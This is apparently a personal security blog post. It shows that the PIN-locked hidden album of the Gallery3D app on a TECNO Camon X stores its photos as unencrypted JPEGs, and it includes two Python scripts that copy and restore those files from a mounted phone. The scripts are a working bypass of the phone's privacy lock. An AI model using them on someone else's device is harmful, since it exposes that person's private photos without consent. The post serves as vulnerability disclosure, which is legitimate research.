# Bypassing Gallary3D (Hidden Images Feature) In TECNO Camon X ## A lil' Bit About It This is something that I challenged my self to do, I had a TECNO Camon X CA7 Model, which is a smart phone and basically in all TECNO smart phone models, there is a feature that allows the user to hide images. I had to hide in some of the images and then I set a pin that I shall use to unlock the vault for hiding my images. A question flew into my mind **"What If I dont know the pin??"** Then I dared my self to take this challenge to research on this petty feature! ## Let The Fun Begin As seen, it asks for a pin, so as we can preview what's in the hidden album. ![](https://hackmd.io/_uploads/HJ9FXCOka.png) We can either bruteforce manually to get the pin since it's a 4 digits pin which will obviously be time consuming, but worth it eventually. Or we can decide to know where the image is then saved to after being sent to the hidden album. Connecting the smartphone to my laptop, and enabling the transfer of files, will allow me to view all folders in the system. ### Looking For The Files ![](https://hackmd.io/_uploads/SkLYEAOk6.png) while enumerating through the folders, I was able to get a folder in **/Android/data/com.android.gallery3d** which looked interesting: ![](https://hackmd.io/_uploads/H1UQLC_yp.png) This is getting even more interesting :) Opening up **.privatealbum**, there is another folder named **.encryptfiles** and it contains the images that we had imported earlier to the hidden vault. ![](https://hackmd.io/_uploads/Hk6sL0_kT.png) The images aren't really images, in this case, I pull the file to my local machine for even further analysis thinking that there might be some sort of encryption working behind all this. Unfortunately my Kali was off so I had to use cyberchef for some quick analysis over this file: ![](https://hackmd.io/_uploads/BkeYwA_yp.png) Now this was even easyyyy! The file type is **"image/jpeg"** ### Getting The Image Back To Normal Ezpizi, The easiest way to get the image back viewable is to just adding an image extension to the file, and we are able to view the image; ![](https://hackmd.io/_uploads/SymrOAOkp.png) ![](https://hackmd.io/_uploads/ByMD_CdkT.png) ### Automating The Exploit With all that clear, I decided to write an exploit script to automate all the processes, and retrieve any hidden image that is available in the smartphone! The link to the exploit is : [Gallery3D Tecno Exploit](https://github.com/tahaafarooq/gallery3d-tecno-exploit), Apart from just the exploit, there is also an android APK file that extracts the hidden images. Below is the **functions.py**: ```python # author : @tahaafarooq # date : 22/09/2023 # desc : pewpew import os import shutil import platform import mimetypes # check operating system def check_os(): system = platform.system() if system == "Windows": return "Windows" elif system == "Linux": return "Linux" class RunExploit(object): def __init__(self): self.author = "@tahaafarooq" def check_hidden_image_folder(self, path): folder = f"{path}/Internal shared storage/Android/data/com.android.gallery3d/.privatealbum/.encryptfiles/" if os.path.exists(folder): return "Found" else: return "Not Found" def unhide_images(self, path, destination): folder = f"{path}/Internal shared storage/Android/data/com.android.gallery3d/.privatealbum/.encryptfiles/" files = os.listdir(folder) for file in files: sf_path = os.path.join(folder, file) mt, _ = mimetypes.guess_type(sf_path) if mt: ext = mimetypes.guess_extension(mt) if ext: new_file_name = f"{os.path.splitext(file)[0]}{ext}" df_path = os.path.join(destination, new_file_name) else: df_path = os.path.join(destination, file) else: df_path = os.path.join(destination, file) shutil.copy(sf_path, df_path) print("Images Unhidden! Abracadabra!") return "Done" ``` Below is **run.py**: ```python # author : @tahaafarooq # date : 22/09/2023 # desc : pewpew import sys from functions import RunExploit, check_os if __name__ == "__main__": operating_system = check_os() if operating_system == "Windows": print("Sorry Mate! This Script Doesn't Run On Windows Yet!") sys.exit(0) elif operating_system == "Linux": source_path = input("Please Enter Your Mobile Mounted Path : ") dest_path = input("Please Enter Path To Save Unhidden Images (/home/kali/Documents/) : ") check_app_avlb = RunExploit().check_hidden_image_folder(source_path) if check_app_avlb == "Found": print("Revealing Hidden Images Now...") proc_unhide = RunExploit().unhide_images(source_path, dest_path) if proc_unhide == "Done": print(f"Please Open {dest_path} To View The Images") else: print("Unable To Reveal Images") else: print("Oops! Looks Like This Model Doesn't Have The Feature!") ``` Unfortunately didn't get any bounty on this since the device model is out of scope :( But PewPew! <div style="width:100%;height:0;padding-bottom:50%;position:relative;"><iframe src="https://giphy.com/embed/l1J9FtGm9VNUerkRi" width="100%" height="100%" style="position:absolute" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></div>